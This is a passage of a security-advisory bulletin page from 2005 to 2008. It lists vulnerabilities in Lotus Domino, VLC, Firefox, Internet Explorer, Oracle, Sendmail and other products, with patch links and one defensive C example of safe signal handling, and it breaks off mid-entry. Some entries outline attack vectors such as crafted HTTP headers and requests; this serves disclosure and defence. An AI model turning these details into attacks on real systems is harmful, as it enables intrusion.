Critical vulnerability in Lotus Domino Web Access (iNotes)

2008-01-04

Risk level: high

Type: Buffer overflow

Source of info: CERT

Impact

A buffer overflow in an ActiveX control used by Lotus Domino Web Access (iNotes) makes it possible for an 
attacker to trigger the overflow through the control and execute arbitrary code.

Overview

As stated in an advisory provided by IBM (http://www-1.ibm.com/support/docview.wss?uid=swg21279071), 
the following conditions must all be met for an attacker to successfully exploit this vulnerability:

(1) The Lotus Domino Web Access feature needs to be enabled to allow users to access their mail via 
a browser.

(2) The user has used the Domino Web Access client at least once, which installs the ActiveX control.

(3) The attacker must create malicious code that exploits the ActiveX control and triggers the buffer 
overflow. This code can be part of an email, an attachment, or a web page.

(4) The user must be persuaded to view the message, attachment or web site that contains the malicious code in the Microsoft Internet Explorer (IE) web browser.

Patches

For workarounds and possible solutions please refer to: http://www-1.ibm.com/support/docview.wss?uid=swg21279071



Multiple vulnerabilities in VLC media player

2007-12-28

Risk level: high

Type: Remote code execution

Source of info: Secunia

Impact

Multiple vulnerabilities have been discovered in VLC Media Player, which can be exploited by malicious people to compromise a user's system.

Overview

The following two errors have been discovered in VLC by Michal Luczaj and Luigi Auriemma:

1) Boundary errors in the "ParseMicroDvd()", "ParseSSA()", and "ParseVplayer()" functions when handling subtitles can be exploited to cause stack-based buffer overflows.

2) A format string error in the web interface listening on port 8080/tcp (disabled by default) can be exploited via a specially crafted HTTP request with a "Connection" header value containing format specifiers.

Successful exploitation of the vulnerabilities allows execution of arbitrary code.

Patches

Check the VLC SVN repository.



Multiple Vulnerabilities in Thunderbird

2007-12-20

Risk level: high

Type: System access

Source of info: Secunia

Impact

Vulnerabilities discovered in Thunderbird can potentially be exploited by malicious people to
compromise a user's system.

Overview

Two vulnerabilities have been reported in Thunderbird, which potentially can be exploited by malicious people to compromise a user's system.

1) An error related to URI handlers could potentially allow execution of arbitrary code.

2) Various errors in the browser engine and the JavaScript engine can potentially be exploited by malicious people to compromise a user's system.

For more information see:
http://www.mozilla.org/security/announce/2007/mfsa2007-29.html

Patches

For complete protection please upgrade to the latest version of Thunderbird 2 and do not enable JavaScript in mail.



Apple Mac OS X Security Update Fixes Multiple Vulnerabilities

2007-12-18

Risk level: critical

Type: System access

Source of info: Secunia

Impact

Apple has issued a security update for Mac OS X, which fixes multiple vulnerabilities.
If you are a Mac OS X user, please update your system as soon as possible.

Overview

For detailed information on all vulnerabilities patched in Mac OS X refer to:
http://docs.info.apple.com/article.html?artnum=307179
http://docs.info.apple.com/article.html?artnum=307224

Patches

http://www.apple.com/support/downloads/



Internet Explorer Multiple Code Execution Vulnerabilities

2007-12-11

Risk level: critical

Type: Remote code execution

Source of info: CERT

Impact

Microsoft has published a cumulative patch for Internet Explorer. The patch resolves four 
privately reported vulnerabilities.

Overview

According to Microsoft, this critical security update resolves four privately reported vulnerabilities. 
The most serious of them could allow remote code execution if a user viewed a specially crafted 
Web page using Internet Explorer. Users whose accounts are configured with fewer user rights on 
the system could be less impacted than users who operate with administrative user rights.

For more details see:
http://www.microsoft.com/technet/security/Bulletin/MS07-069.mspx

Patches

Use Windows Update, or see:
http://www.microsoft.com/technet/security/Bulletin/MS07-069.mspx



Vulnerabilities in Symantec Mail Security for Exchange

2007-10-29

Risk level: high

Type: DoS

Source of info: Secunia

Impact

Multiple vulnerabilities in Symantec Mail Security for Exchange can be exploited to cause a DoS (Denial 
of Service) and compromise a vulnerable system.

Overview

See Secunia Advisory for more details:
http://secunia.com/advisories/27304/

Patches

Use vendor instructions to get patches.



Vulnerabilities in Novell - OpenSuSE

2007-10-12

Risk level: high

Type: many types

Source of info: SuSE Security Team

Impact

Seven vulnerabilities have been patched in Novell OpenSuSE Linux. To avoid remote system compromise, please update your system.

Overview

The following security vulnerabilities have been fixed:
- TK GIF image loader overflow
- openssl off-by-one overflow
- hugin temporary filename
- not affected by Xen virtual pygrub escape problem
- lighttpd buffer overflow
- novell-groupwise-gwclient SSL problems
- sylpheed-claws format string problem

For details and upgrades see SUSE Security Summary Report:
http://www.novell.com/linux/security/advisories/2007_20_sr.html

Patches

Use Novell's FTP server and/or the YaST Online Update.



Microsoft Updates for Multiple Vulnerabilities - Security Bulletin for August 2007

2007-08-14

Risk level: high

Type: many types

Source of info: Microsoft Security Team

Impact

Microsoft has released updates that address several critical vulnerabilities in Microsoft 
Windows, Internet Explorer, Windows Media Player, Office, Office for Mac, XML Core Services, 
Visual Basic, Virtual PC, and Virtual Server.

Exploitation of these vulnerabilities could allow a remote, unauthenticated attacker to execute 
arbitrary code or cause a denial of service on a vulnerable system.

Overview

For more information please refer to Microsoft Security Summary Bulletin: 
http://www.microsoft.com/technet/security/bulletin/ms07-aug.mspx

Patches

Please use the Microsoft Update (https://update.microsoft.com/microsoftupdate/v6/default.aspx) and Microsoft Office Update (http://officeupdate.microsoft.com/) sites. 
Mac users please use the Mactopia web site:
http://www.microsoft.com/mac/




Symantec ActiveX Control Input Validation Error

2007-08-09

Risk level: high

Type: Remote code execution

Source of info: Symantec

Impact

An input validation error has been discovered in two ActiveX controls used by Norton AntiVirus, Norton 
Internet Security, and Norton SystemWorks.

These vulnerabilities can be exploited by malicious people to compromise a user's system.

Overview

For more details please refer to:
http://www.symantec.com/avcenter/security/Content/2007.08.09.html

Patches

Please use LiveUpdate.



Vulnerability in LinkedIn Internet Explorer Toolbar

2007-07-24

Risk level: highly critical

Type: System access

Source of info: Secunia

Impact

Jared DeMott and Justin Seitz from VDA Labs discovered a vulnerability in the LinkedIn Internet 
Explorer Toolbar that can be exploited to compromise a user's system.

Overview

For more details please refer to:
http://www.vdalabs.com/tools/linkedin.html
http://secunia.com/advisories/26181/

Patches

Please update the toolbar to the latest version:
http://www.linkedin.com/static?key=browser_toolbar_download



Oracle published official patch for multiple vulnerabilities

2007-07-20

Risk level: critical

Type: many types

Source of info: ORACLE

Impact

Oracle has published a Critical Patch Update, a collection of patches for 45 security 
vulnerabilities and multiple non-security related bugs. Due to the threat posed by a successful 
attack, it is highly recommended to apply these fixes as soon as possible.

Overview

For more details please refer to Oracle's web site:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2007.html

Patches

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2007.html



Multiple Vulnerabilities in Mozilla Firefox

2007-07-19

Risk level: critical

Type: many types

Source of info: Secunia

Impact

Multiple vulnerabilities have been reported in Mozilla Firefox, which can be exploited to conduct 
spoofing and cross-site scripting attacks. These attacks can lead to a user's system compromise.

Overview

According to Secunia, the following errors have been discovered:

a) Errors in the browser engine can be exploited to cause memory corruption and potentially lead to 
arbitrary code execution.

b) The JavaScript engine has leaks that can be exploited to cause memory corruption and 
potentially lead to arbitrary code execution.

c) The "addEventListener" and "setTimeout" methods contain errors that can be exploited to inject 
script into another site's context, bypassing the browser's same-origin policy.

d) Errors in cross-domain handling can be exploited to inject arbitrary HTML and script code 
into a sub-frame of another web site.

e) An unspecified error in the handling of elements outside of documents allows an attacker 
to call an event handler and execute arbitrary code with chrome privileges.

f) An unspecified error in the handling of "XPCNativeWrapper" can lead to execution of 
user-supplied code.

Patches

For updates see: 
http://www.mozilla.com/firefox/



Adobe Flash Player Multiple Vulnerabilities

2007-07-16

Risk level: high

Type: remote system compromise

Source of info: CERT

Impact

Vulnerabilities in Adobe Flash Player can be exploited to gather sensitive information or to compromise a user's system.

Overview

For more information and the list of vulnerable systems please refer to:
http://secunia.com/advisories/26027/
http://www.adobe.com/support/security/bulletins/apsb07-12.html

Patches

Flash Player 9.0.45.0 and earlier (update to version 9.0.47.0):
http://www.adobe.com/go/getflash

Flash Player 9.0.45.0 and earlier - network distribution (update to version 9.0.47.0):
http://www.adobe.com/licensing/distribution

Flash CS3 Professional (update to version 9.0.47.0):
http://www.adobe.com/support/flashplayer/downloads.html

Flash Professional 8, Flash Basic (update to version 8.0.35.0):
http://www.adobe.com/support/flashplayer/downloads.html

Flex 2.0 (update to version 9.0.47.0):
http://www.stage.adobe.com/support/flashplayer/downloads.html#fp9



Microsoft published Security Bulletin Summary for July 2007

2007-07-10

Risk level: highly critical

Type: Remote code execution

Source of info: Microsoft Security Team

Impact

Microsoft has reported the following vulnerabilities discovered and patched since the publication of 
the previous bulletin in June: 3 critical, 2 important and 1 moderate.

Overview

Most of the reported errors allow remote code execution and have been discovered in: Microsoft Excel, 
Microsoft Windows Active Directory, Microsoft .NET Framework, Microsoft Internet Information Services 
(IIS) and the Windows Vista Firewall.

For more details please refer to:
http://www.microsoft.com/technet/security/bulletin/ms07-jul.mspx

Patches

http://www.microsoft.com/technet/security/bulletin/ms07-jul.mspx



SAP Message Server Buffer Overflow Vulnerability

2007-07-09

Risk level: high

Type: Buffer overflow

Source of info: NGSSoftware Insight Security

Impact

A vulnerability in SAP Message Server can be exploited to compromise a vulnerable system.
The vulnerability has been reported by Mark Litchfield from NGSSoftware Insight Security Research.

Overview

The vulnerability is caused by a boundary error when processing HTTP requests and can be exploited to cause a heap-based buffer overflow via e.g. a 
specially crafted GET request.

Successful exploitation allows execution of arbitrary code.

For additional information see: 
http://secunia.com/advisories/25966
http://www.us-cert.gov/cas/bulletins/SB07-197.html
http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-sap-message-server-heap-overflow/

Patches

Contact the vendor and update to the latest version.



Yahoo! Messenger Two ActiveX Controls Buffer Overflows

2007-06-11

Risk level: highly critical

Type: Buffer overflow

Source of info: Secunia

Impact

Two vulnerabilities in Yahoo! Messenger have been reported. They can be exploited by malicious people 
to compromise a user's system.

Overview

Successful exploitation of the vulnerabilities allows execution of arbitrary code. The vulnerabilities are 
confirmed in version 8.1.0.249. Other versions may also be affected.

For more details see Secunia Advisory:
http://secunia.com/advisories/25547/

Patches

http://messenger.yahoo.com



Microsoft Security Bulletin Summary for May 2007

2007-05-10

Risk level: critical

Type: Remote code execution

Source of info: Microsoft Security Team

Impact

According to the Microsoft Security Bulletin, there are seven critical updates available for Microsoft products. All of them address vulnerabilities that could allow remote code execution. It is highly recommended to update vulnerable systems.

Overview

For more details and updates see:
http://www.microsoft.com/technet/security/bulletin/ms07-may.mspx

Patches

See:
http://www.microsoft.com/technet/security/bulletin/ms07-may.mspx



Critical patches for Oracle Products

2007-04-19

Risk level: high

Type: Buffer overflow

Source of info: ORACLE

Impact

Oracle has published a Critical Patch Update, which consists of a collection of patches for multiple security 
vulnerabilities.

Overview

According to the Secunia Advisory, some of these vulnerabilities have unknown impacts, while others 
can be exploited to bypass certain security restrictions, cause a DoS (Denial of Service), 
conduct cross-site scripting and SQL injection attacks, or potentially compromise a vulnerable 
system.

More detailed information about this update can be found on the Oracle web site under the following link:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2007.html

Patches

For patches see:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2007.html



Microsoft Windows DNS Service Buffer Overflow Vulnerability

2007-04-16

Risk level: highly critical

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

A vulnerability in the RPC interface of the Windows DNS Server could allow an attacker to run code in the security context 
of the Domain Name System Server Service, which by default runs as Local SYSTEM.

Overview

According to the Microsoft web site, Microsoft is investigating new public reports of attacks exploiting 
a vulnerability in the Domain Name System (DNS) Server Service in Microsoft Windows 2000 Server Service Pack 
4, Windows Server 2003 Service Pack 1, and Windows Server 2003 Service Pack 2. 
Microsoft Windows 2000 Professional Service Pack 4, Windows XP Service Pack 2, and Windows Vista are not 
affected, as these versions do not contain the vulnerable code.
At this time, the attack does not appear widespread.

For more details see:
http://www.microsoft.com/technet/security/advisory/935964.mspx

Patches

Not available.



Vulnerability in Windows Animated Cursor Handling

2007-03-29

Risk level: high

Type: System access

Source of info: Microsoft Security Team

Impact

Vulnerabilities in the way Microsoft Windows handles animated cursor (.ani) files can be exploited by 
malicious people to compromise a user's system. 

Overview

According to Microsoft Advisory 935423, in order for this attack to be carried out, a user must either
visit a Web site that contains a Web page used to exploit the vulnerability, or view a specially 
crafted e-mail message or e-mail attachment sent to them by an attacker. Exploitation of this 
vulnerability can allow arbitrary code execution.

Patches

Check Windows Update - the patch should be available soon.



Vulnerabilities in StarOffice

2007-03-28

Risk level: high

Type: System access

Source of info: Secunia

Impact

Vulnerabilities in StarOffice can be used by malicious people to compromise a user's system.

Overview

Two vulnerabilities have been found in StarOffice 6.x / StarSuite 7.x / StarSuite 8.x. According to Sun 
Microsystems, the first results from the way StarOffice processes StarCalc 1.0 documents (.sdc) 
and may allow a remote unprivileged user (who provides a StarCalc document that is opened by a 
local user) to execute arbitrary commands on the system with the privileges of the user running 
StarOffice/StarSuite. The second is caused by the way in which StarOffice/StarSuite 6, 7 and 8 process 
hyperlinks (URLs) in documents, and likewise may allow a remote unprivileged user who provides 
a StarOffice/StarSuite document that is opened by a local user to execute arbitrary commands 
on the system with the privileges of the user running StarOffice/StarSuite.


Patches

None.



Apple Updates for Multiple Vulnerabilities

2007-03-14

Risk level: high

Type: Remote code execution

Source of info: CERT

Impact

Apple Mac OS X is affected by multiple vulnerabilities. 

Overview

Apple has released Security Update 2007-003 to address multiple vulnerabilities, one of which may allow a remote 
attacker to place and run malicious programs on your computer.

Patches

Install Apple Security Update 2007-003 through Software Update (see: http://docs.info.apple.com/article.html?artnum=106704).



Mozilla Firefox Multiple Vulnerabilities

2007-03-06

Risk level: high

Type: many types

Source of info: Secunia

Impact

Vulnerabilities in Mozilla Firefox can be exploited 
by malicious people to bypass certain security 
restrictions, conduct cross-site scripting and 
spoofing attacks, gain knowledge of sensitive 
information, and potentially compromise a user's 
system.

Overview

According to Secunia (http://secunia.com/advisories/24205/) 
the following vulnerabilities have been detected:

1) An error in the handling of the 
"location.hostname" DOM property can be exploited 
to bypass certain security restrictions.

2) An integer underflow error in the Network 
Security Services (NSS) code when processing SSLv2 
server messages can be exploited to cause a 
heap-based buffer overflow via a certificate with 
a public key too small to encrypt the "Master 
Secret".

Successful exploitation may allow execution of arbitrary code.

NOTE: Support for SSLv2 is disabled in Firefox 
2.x. This version is only vulnerable if the user has 
modified hidden internal NSS settings to re-enable 
SSLv2 support.

3) It is possible to conduct cross-site scripting 
attacks against sites containing a frame with a 
"data:" URI as source.

Successful exploitation requires that a user is 
tricked into visiting a malicious website and 
opening a blocked popup.

4) It is possible to open windows containing local 
files thereby stealing the contents when the full 
path of a locally saved file containing malicious 
script code is known. This can be exploited in 
combination with a flaw in the seeding of the 
pseudo-random number generator causing downloaded 
files to be saved to temporary files with a 
somewhat predictable name.

Successful exploitation requires that a user is 
tricked into visiting a malicious website and 
opening a blocked popup.

5) Browser UI elements like the host name and 
security indicators can be spoofed using a 
specially crafted custom cursor and manipulating 
the CSS3 hotspot property.

6) It may be possible to gain knowledge of 
sensitive information from a website due to an 
error resulting in two web pages colliding in the 
disk cache thereby potentially appending part of 
one document to the other.

Successful exploitation requires that a user is 
tricked into visiting a malicious website while 
visiting the target website.

7) Various errors in the Mozilla parser when 
handling invalid trailing characters in HTML tag 
attribute names, and during processing of UTF-7 
content when child frames inherit the character 
set of their parent window, can be exploited to 
conduct cross-site scripting attacks.

8) A vulnerability in the Password Manager may be 
exploited to conduct phishing attacks.

For more information see Secunia advisory SA23046.

9) Multiple memory corruption errors exist in the 
layout engine, JavaScript engine, and in SVG. Some 
of these may be exploited to execute arbitrary 
code on a user's system.

10) An error within the handling of the onUnload 
event handler and self-modifying document.write()
calls can be exploited to corrupt memory and
potentially execute arbitrary code.

11) The fix for MFSA 2006-72 introduced a 
regression, which can be exploited to execute 
arbitrary code by setting the "src" attribute of 
an "IMG" tag to a specially crafted 
javascript: URI.

Patches

Update to the newest version of Firefox:
http://www.mozilla.com/en-US/



Vulnerability in Microsoft Office Could Allow Remote Code Execution

2007-02-05

Risk level: critical

Type: Remote code execution

Source of info: Microsoft Security Team

Impact

Microsoft is investigating new public reports of Microsoft Excel 'zero-day' attacks using a vulnerability in Microsoft Office 2000, Microsoft Office XP, Microsoft Office 2003, and Microsoft Office 2004 for Mac.

In order for this attack to be carried out, a user must first open a malicious Office file attached to an e-mail or otherwise provided to them by an attacker.

Overview

According to Microsoft, the vulnerability cannot be exploited on Office 2007 or on Works 2004, 2005, or 2006.

An attacker who successfully exploited this vulnerability could gain the same user rights as 
the local user, so users whose accounts are 
configured to have fewer user rights on the system 
could be less affected than users who operate with 
administrative user rights.

In a Web-based attack scenario, an attacker would 
have to host a Web site that contains an Office 
file that is used to attempt to exploit this 
vulnerability. In addition, compromised Web sites 
and Web sites that accept or host user-provided 
content could contain specially crafted content 
that could exploit this vulnerability. An attacker 
would have no way to force users to visit a 
malicious Web site. Instead, an attacker would 
have to persuade them to visit the Web site, 
typically by getting them to click a link that 
takes them to the attacker's site.

The vulnerability cannot be exploited 
automatically through e-mail. For an attack to be 
successful a user must open an attachment that is 
sent in an e-mail message.
Users who have installed and are using the Office 
Document Open Confirmation Tool for Office 2000 will be prompted with Open, Save, or Cancel before 
opening a document.

For more details please see:
http://www.microsoft.com/technet/security/advisory/932553.mspx

Patches

Patches are currently not available, so do not open or save Office files that you receive from untrusted sources, or that you receive unexpectedly from trusted sources.



ORACLE Releases Patches for several vulnerabilities

2007-01-17

Risk level: critical

Type: many types

Source of info: ORACLE

Impact

Oracle has released critical patches for 
vulnerabilities in several Oracle products. The 
impacts of these vulnerabilities include remote 
execution of arbitrary code, information disclosure, 
and denial of service.

Overview

According to Oracle, the Critical Patch Update (CPU) for January 2007 contains:
    * 17 new security fixes for the Oracle Database, one of which is for Oracle Database client-only installations
    * 9 new security fixes for the Oracle HTTP Server
    * 12 new security fixes for the Oracle Application Server
    * 7 new security fixes for the Oracle E-Business Suite
    * 6 new security fixes for the Oracle Enterprise Manager
    * 3 new security fixes for the Oracle PeopleSoft Enterprise PeopleTools

Many Oracle products include or share code with 
other vulnerable Oracle products and components. 
Therefore, one vulnerability may affect multiple 
Oracle products and components. For example, the 
January 2007 CPU does not contain any fixes 
specifically for Oracle Collaboration Suite. 
However, Oracle Collaboration Suite is affected by 
vulnerabilities in Oracle Database and Oracle 
Application Server, so sites running Oracle 
Collaboration suite should install fixes for 
Oracle Database and Oracle Application Server. 
Refer to the January 2007 CPU for details 
regarding which vulnerabilities affect specific 
Oracle products and components. 

Patches

Apply the appropriate patches or upgrade as specified 
in the Critical Patch Update - January 2007:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html



Critical update for Adobe Reader

2007-01-10

Risk level: critical

Type: remote system compromise

Source of info: Adobe Inc.

Impact

According to Adobe Bulletin APSB07-01 there are several vulnerabilities, including issues that have already been disclosed. It is recommended that users update to the most current version of Adobe Reader or Acrobat available.

Overview

According to Adobe Inc. an update is available for a cross-site scripting (XSS) vulnerability in versions 7.0.8 and earlier of Adobe Reader and Acrobat that could allow remote attackers to inject arbitrary JavaScript into a browser session. This vulnerability, previously reported in APSA07-01 on January 4, 2007, has been assigned an important severity rating. Additional vulnerabilities have been identified in versions 7.0.8 and earlier of Adobe Reader and Acrobat that could allow an attacker who successfully exploits these vulnerabilities to take control of the affected system. These vulnerabilities have been assigned a critical severity rating. A malicious file must be loaded in Adobe Reader by the end user for an attacker to exploit these vulnerabilities. It is recommended that users update to the most current version of Adobe Reader or Acrobat available.

For more details see:
http://secunia.com/advisories/23666/

Patches

http://www.adobe.com/support/security/bulletins/apsb07-01.html



Exploit Code Available for Multiple Vulnerabilities in Sun Java Runtime Environment

2007-01-10

Risk level: high

Type: Elevation of privilege

Source of info: CERT

Impact

Security vulnerabilities in the Java Runtime Environment may allow untrusted applets to elevate privileges and execute arbitrary code.

Overview

According to the US-CERT there is publicly available exploit code for multiple vulnerabilities in Sun Java Runtime Environment (JRE). 

We encourage users to take the following actions to 
help mitigate the effects of these vulnerabilities:
  - upgrade to patched versions of the affected Sun products as specified in Sunsolve documents 102729 and 102731;
  - disable Java, as specified in the "Securing Your Web Browser" document, until the updates can be applied.

Patches

http://sunsolve.sun.com/search/document.do?assetkey=1-26-102729-1
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102731-1



Microsoft Security Bulletin Summary for January, 2007

2007-01-09

Risk level: critical

Type: many types

Source of info: Microsoft Security Team

Impact

Microsoft has released an advisory consisting of updates for newly discovered vulnerabilities. There are four critical vulnerabilities and one important.

Overview

The critical vulnerabilities described in the advisory are:
 - vulnerabilities in Microsoft Excel that could allow remote code execution (927198), see MS07-003,
 - vulnerabilities in Microsoft Outlook that could allow remote code execution (925938), see MS07-004,
 - a vulnerability in Vector Markup Language that could allow remote code execution (929969). This update resolves vulnerabilities in Internet Explorer that could allow remote code execution.

The important update is:
 - a vulnerability in the Microsoft Office 2003 Brazilian Portuguese Grammar Checker that could allow remote code execution (921585).

For details see:
http://www.microsoft.com/technet/security/bulletin/ms07-jan.mspx

Patches

See:
http://www.microsoft.com/technet/security/bulletin/ms07-jan.mspx



Cross-Site scripting vulnerabilities in SquirrelMail

2006-12-04

Risk level: moderate

Type: Cross-Site Scripting (XSS)

Source of info: Secunia

Impact

Some vulnerabilities have been reported in 
SquirrelMail, which can be exploited by malicious 
people to conduct cross-site scripting and script 
insertion attacks.

Overview

According to the Secunia Advisory, SquirrelMail versions prior to 1.4.9a contain the following vulnerabilities:

1) Input passed to certain parameters in webmail.php 
and compose.php in the "draft", "compose", and 
"mailto" functionality is not properly sanitised 
before being returned to the user. This can be 
exploited to execute arbitrary HTML and script code 
in a user's browser session in context of an affected site.

2) Input validation errors exist in the magicHTML 
filter when sanitising HTML mails. This can be 
exploited to insert arbitrary HTML and script 
code, which is executed in a user's browser 
session in context of an affected site when the 
malicious data is viewed.

Successful exploitation of some of these errors 
requires that the target user runs Microsoft 
Internet Explorer.

Patches

http://squirrelmail.org/security/issue/2006-12-02



Microsoft Security Bulletin Summary for August

2006-08-08

Risk level: critical

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

Multiple vulnerabilities have been discovered in Microsoft products. There are 9 critical and 3 important updates.

Overview

The following issues have been discovered:
- Vulnerability in Server Service Could Allow Remote Code Execution (921883)
- Vulnerability in DNS Resolution Could Allow Remote Code Execution (920683)
- Remote code execution issue in Internet Explorer (918899)
- Vulnerability in Microsoft Windows Could Allow Remote Code Execution (920214)
- Vulnerability in Microsoft Management Console Could Allow Remote Code Execution (917008)
- Vulnerability in HTML Help Could Allow Remote Code Execution (922616)
- Vulnerability in Microsoft Visual Basic for Applications Could Allow Remote Code Execution (921645)
- Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (922968)
- Vulnerability in Windows Kernel Could Result in Remote Code Execution (917422)
- Vulnerability in Windows Explorer Could Allow Remote Code Execution (921398)
- Vulnerability in Windows Kernel Could Result in Elevation of Privilege (920958)
- Vulnerabilities in Microsoft Windows Hyperlink Object Library Could Allow Remote Code Execution (920670)

For a detailed overview see:
http://www.microsoft.com/technet/security/bulletin/ms06-aug.mspx

Patches

http://www.microsoft.com/technet/security/bulletin/ms06-aug.mspx



Critical Vulnerabilities in Oracle

2006-07-19

Risk level: high

Type: many types

Source of info: CERT

Impact

The impact of these vulnerabilities varies depending on the product, component, and configuration of the system. Potential consequences include the execution of arbitrary code or commands, information disclosure, and denial of service. Vulnerable components may be available to unauthenticated, remote attackers. An attacker who compromises an Oracle database may be able to gain access to sensitive information.

Overview

For the list of affected products and a detailed overview please visit:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2006.html

Patches

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2006.html



Vulnerabilities in Microsoft Windows, Internet Explorer, Media Player, Word, PowerPoint, and Exchange

2006-06-13

Risk level: critical

Type: many types

Source of info: Microsoft Security Team

Impact

Microsoft has released updates for multiple vulnerabilities in Microsoft products. Eight of them are rated critical.

Overview

For detailed overview and patches see:
http://www.microsoft.com/technet/security/bulletin/ms06-jun.mspx

Patches

Please use Windows Update.
For details about the patches see:
http://www.microsoft.com/technet/security/bulletin/ms06-jun.mspx



Microsoft Windows and Exchange Server Vulnerabilities

2006-05-09

Risk level: critical

Type: many types

Source of info: Microsoft Security Team

Impact

Three vulnerabilities have been discovered in Microsoft products. Two of them are critical and allow remote code execution; one is moderate.

Overview

The bulletins are:
-Vulnerability in Microsoft Exchange Could Allow Remote Code Execution (916803)
-Vulnerabilities in Macromedia Flash Player from Adobe Could Allow Remote Code Execution (913433)
-Vulnerability in Microsoft Distributed Transaction Coordinator Could Allow Denial of Service (913580)

For details see:
http://www.microsoft.com/technet/security/bulletin/ms06-may.mspx

Patches

Please use Automatic Updates.
For details on the patches see:
http://www.microsoft.com/technet/security/bulletin/ms06-may.mspx



Mozilla Products Contain Multiple Vulnerabilities

2006-04-17

Risk level: medium

Type: Remote code execution

Source of info: US-CERT

Impact

The Mozilla web browser and products based on Mozilla components contain several vulnerabilities. One of them could allow a remote attacker to execute arbitrary code on a system running an affected component.

Overview

The list of affected products and a detailed report on the vulnerabilities can be found at:
http://www.us-cert.gov/cas/techalerts/TA06-107A.html

Patches

Please check
http://www.mozilla.org
for upgrades



Microsoft Windows and Internet Explorer Vulnerabilities

2006-04-11

Risk level: high

Type: many types

Source of info: Microsoft Security Team

Impact

Microsoft has released updates that address critical vulnerabilities in Microsoft Windows and Internet Explorer. Exploitation of these vulnerabilities could allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial of service on a vulnerable system.

Overview

For detailed overview see:
http://www.microsoft.com/technet/security/bulletin/ms06-apr.mspx

Patches

See:
http://www.microsoft.com/technet/security/bulletin/ms06-apr.mspx



Sendmail Race Condition Vulnerability

2006-03-23

Risk level: high

Type: Remote code execution

Source of info: CERT

Impact

A remote, unauthenticated attacker could execute arbitrary code with the privileges of the Sendmail process. If Sendmail is running as root, the attacker could take complete control of an affected system.

Overview

Sendmail contains a race condition caused by the improper handling of asynchronous signals. In particular, by forcing the SMTP server to hit an I/O timeout at exactly the right instant, an attacker may be able to execute arbitrary code with the privileges of the Sendmail process.

More information is available in the Sendmail version 8.13.6 release page and the Sendmail MTA Security Vulnerability Advisory.
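
The following is an added example, not Sendmail's code, showing the discipline that prevents this class of race: the timeout signal handler only sets a flag, and everything else (giving up, freeing state, logging) stays in the normal control flow after the interrupted read() returns. The function and variable names are assumptions; the self-check runs on a pipe so it needs no network.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>

/* Added example, not Sendmail's code. The class of bug described above
 * comes from the opposite design: a handler that itself frees buffers,
 * calls stdio, or longjmp()s out of whatever the timeout interrupted, so
 * that half-updated state is reused by the code it jumped back into. */

static volatile sig_atomic_t timed_out;

static void on_alarm(int sig)
{
    (void)sig;
    timed_out = 1;      /* async-signal-safe: a single store, nothing else */
}

/* Read up to len bytes from fd, giving up after timeout_secs.
 * Returns bytes read (0 at EOF), -1 on timeout, -2 on any other error. */
ssize_t read_with_timeout(int fd, void *buf, size_t len, unsigned timeout_secs)
{
    struct sigaction sa, old;
    ssize_t n;

    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_alarm;
    sigemptyset(&sa.sa_mask);
    sa.sa_flags = 0;                /* no SA_RESTART: read() must return EINTR */
    if (sigaction(SIGALRM, &sa, &old) == -1)
        return -2;

    timed_out = 0;
    alarm(timeout_secs);
    do {
        n = read(fd, buf, len);
    } while (n == -1 && errno == EINTR && !timed_out);   /* other signals: retry */
    alarm(0);                       /* cancel the pending alarm before anything else */
    sigaction(SIGALRM, &old, NULL);

    if (n == -1)
        return timed_out ? -1 : -2;
    return n;
}

/* Self-check on a pipe: an empty pipe must time out, a pipe holding
 * "hello" must return 5. Returns 1 when both hold. */
int timeout_demo(void)
{
    int p[2];
    char buf[16];
    int ok = 1;

    if (pipe(p) == -1)
        return 0;
    if (read_with_timeout(p[0], buf, sizeof buf, 1) != -1)
        ok = 0;
    if (write(p[1], "hello", 5) != 5 || read_with_timeout(p[0], buf, sizeof buf, 1) != 5)
        ok = 0;
    close(p[0]);
    close(p[1]);
    return ok;
}
```

There is still a small window between alarm() and read() in which the signal could arrive early; a production implementation closes it with pselect() or the self-pipe trick, but the rule that matters for the bug class above is the same: the handler touches nothing but a sig_atomic_t flag.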

Patches

For details see:
http://www.sendmail.com/company/advisory/



Cumulative Security Update for Internet Explorer

2005-12-13

Risk level: critical

Type: Remote code execution

Source of info: Microsoft Security Team

Impact

Four critical vulnerabilities have been found in Microsoft Internet Explorer, which can be used to compromise a user's system.

Overview

Details of the vulnerabilities:
1) A remote code execution vulnerability exists in the way Internet Explorer displays file download dialog boxes and accepts user input during interaction with a Web page. An attacker could exploit the vulnerability by constructing a malicious Web page that could potentially allow remote code execution if a user visited the malicious Web site. An attacker who successfully exploited this vulnerability could take complete control of an affected system. However, significant user interaction is required to exploit this vulnerability.

2) An information disclosure vulnerability exists in the way Internet Explorer behaves in certain situations where an HTTPS proxy server requires clients to use Basic authentication. This vulnerability could allow an attacker to read Web addresses in clear text sent from Internet Explorer to a proxy server despite the connection being an HTTPS connection.

3) A remote code execution vulnerability exists in the way Internet Explorer instantiates COM objects that are not intended to be instantiated in Internet Explorer. An attacker could exploit the vulnerability by constructing a malicious Web page that could potentially allow remote code execution if a user visited the malicious Web site. An attacker who successfully exploited this vulnerability could take complete control of an affected system.

4) A remote code execution vulnerability exists in the way Internet Explorer handles mismatched Document Object Model objects. An attacker could exploit the vulnerability by constructing a malicious Web page.

For more details visit:
http://www.microsoft.com/technet/security/bulletin/ms05-dec.mspx

Patches

For details see:
http://www.microsoft.com/technet/security/bulletin/ms05-dec.mspx



Multiple Vulnerabilities in Oracle Products

2005-11-19

Risk level: critical

Type: Remote code execution

Source of info: CERT

Impact

Oracle released a Critical Patch Update in October 2005. It addresses more than eighty vulnerabilities 
in different Oracle products and components. The impact of these vulnerabilities varies depending
on the product, component, and configuration of the system. Potential consequences include remote
